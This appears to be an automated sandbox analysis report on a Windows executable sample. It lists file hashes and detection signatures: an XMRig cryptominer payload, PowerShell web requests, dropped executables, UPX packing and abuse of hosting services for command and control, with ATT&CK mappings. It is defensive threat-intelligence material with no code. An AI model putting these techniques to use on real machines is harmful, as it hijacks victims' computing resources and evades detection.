General

  • Target

    a46529389faeecf1ca33e234a0a621d0_NeikiAnalytics.exe

  • Size

    1.6MB

  • Sample

    240524-etzfqscg8z

  • MD5

    a46529389faeecf1ca33e234a0a621d0

  • SHA1

    946123f28c252808423b3271d79873b099ae4a7b

  • SHA256

    07b076842e19795fe7ee9eb300ab099ffc820342d74d4ad513792f9a8d5315be

  • SHA512

    4d7cfa05b1a91d5e9cc0a3eeef9b956d9c1646230653ce846066e72c6dea49faaa2c8abfbd89dddc9b74af618008f38c2a81b1c024ca361f067321eaa928a557

  • SSDEEP

    24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsZLHYm2WVDi9UYd:Lz071uv4BPMkFfdg6NsNtJVi1

Malware Config

Targets

    • Target

      a46529389faeecf1ca33e234a0a621d0_NeikiAnalytics.exe

    • Size

      1.6MB

    • MD5

      a46529389faeecf1ca33e234a0a621d0

    • SHA1

      946123f28c252808423b3271d79873b099ae4a7b

    • SHA256

      07b076842e19795fe7ee9eb300ab099ffc820342d74d4ad513792f9a8d5315be

    • SHA512

      4d7cfa05b1a91d5e9cc0a3eeef9b956d9c1646230653ce846066e72c6dea49faaa2c8abfbd89dddc9b74af618008f38c2a81b1c024ca361f067321eaa928a557

    • SSDEEP

      24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsZLHYm2WVDi9UYd:Lz071uv4BPMkFfdg6NsNtJVi1

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Command and Control

Web Service

1
T1102

Tasks